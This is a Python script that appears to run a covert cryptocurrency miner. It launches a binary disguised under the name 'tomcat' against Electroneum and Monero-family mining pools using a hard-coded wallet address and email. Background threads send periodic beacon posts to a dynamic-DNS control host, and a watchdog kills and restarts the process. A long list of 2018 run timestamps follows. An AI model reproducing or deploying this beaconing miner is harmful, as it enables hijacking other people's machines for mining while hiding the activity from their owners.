import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:06.532498
#2018-02-17 16:13:04.470047
#2018-02-17 18:00:05.750024
#2018-02-17 19:46:07.754273
#2018-02-17 21:35:01.430876
#2018-02-17 23:19:06.641581
#2018-02-18 01:07:06.518105
#2018-02-18 02:54:01.344613
#2018-02-18 04:43:04.034326
#2018-02-18 06:35:04.731369
#2018-02-18 08:23:01.870049
#2018-02-18 10:11:06.938382
#2018-02-18 11:57:05.480125
#2018-02-18 13:42:06.202983
#2018-02-18 15:33:07.475129
#2018-02-18 17:21:04.178192
#2018-02-18 19:10:01.647873
#2018-02-18 20:56:07.172987
#2018-02-18 22:41:01.561874
#2018-02-19 00:30:10.179891
#2018-02-19 02:15:07.380763
#2018-02-19 04:04:06.079207
#2018-02-19 05:48:04.198122
#2018-02-19 07:37:01.356197
#2018-02-19 09:26:07.210512
#2018-02-19 11:16:02.111398
#2018-02-19 13:04:05.055232
#2018-02-19 14:52:06.662678
#2018-02-19 16:40:04.849265
#2018-02-19 18:27:02.072671
#2018-02-19 20:14:04.410498
#2018-02-19 22:03:05.189686
#2018-02-19 23:48:03.204655
#2018-02-20 01:36:08.143532
#2018-02-20 03:24:01.579664
#2018-02-20 05:10:08.286748
#2018-02-20 06:53:05.471939
#2018-02-20 08:40:04.356919
#2018-02-20 10:24:05.096888
#2018-02-20 12:09:07.162305
#2018-02-20 13:56:09.077584
#2018-02-20 15:40:01.274465
#2018-02-20 17:26:02.142620
#2018-02-20 19:15:03.666947
#2018-02-20 21:03:08.210982
#2018-02-20 22:47:06.372296
#2018-02-21 00:27:06.473630
#2018-02-21 02:14:06.440540
#2018-02-21 04:01:05.237233
#2018-02-21 05:48:06.133920
#2018-02-21 07:38:01.268492
#2018-02-21 09:22:06.606779
#2018-02-21 11:10:09.450642
#2018-02-21 12:57:08.786799
#2018-02-21 14:44:09.396265
#2018-02-21 16:31:06.696509
#2018-02-21 18:23:08.731715
#2018-02-21 20:09:07.549034
#2018-02-21 21:56:06.283391
#2018-02-21 23:43:08.442709
#2018-02-22 01:33:01.508085
#2018-02-22 03:20:09.035091
#2018-02-22 05:09:05.258356
#2018-02-22 06:54:04.543002
#2018-02-22 08:43:06.626634
#2018-02-22 10:31:09.320760
#2018-02-22 12:17:01.479864
#2018-02-22 14:01:07.873704
#2018-02-22 15:48:14.462435
#2018-02-22 17:35:13.209755
#2018-02-22 19:23:05.347079
#2018-02-22 21:16:01.951436
#2018-02-22 23:02:02.116741
#2018-02-23 00:50:02.857985
#2018-02-23 02:39:01.312673
#2018-02-23 04:26:08.203438
#2018-02-23 06:11:06.653579
#2018-02-23 07:56:03.478871
#2018-02-23 10:12:07.003520
#2018-02-23 12:04:05.557727
#2018-02-23 13:53:06.803308
#2018-02-23 15:46:05.527248
#2018-02-23 17:32:08.768283
#2018-02-23 19:19:05.435629
#2018-02-23 21:02:05.722049
#2018-02-23 22:46:04.899197
#2018-02-24 00:33:04.323377
#2018-02-24 02:24:01.979082
#2018-02-24 04:14:02.120656
#2018-02-24 06:02:02.027453
#2018-02-24 07:50:01.764837
#2018-02-24 09:36:01.542613
#2018-02-24 11:29:04.478287
#2018-02-24 13:18:01.501778
#2018-02-24 15:09:01.700885
#2018-02-24 16:57:05.068494
#2018-02-24 18:45:07.443502
#2018-02-24 20:35:06.802130
#2018-02-24 22:38:02.207299
#2018-02-25 01:44:06.983176
#2018-02-25 05:09:03.405984
#2018-02-25 10:26:01.528877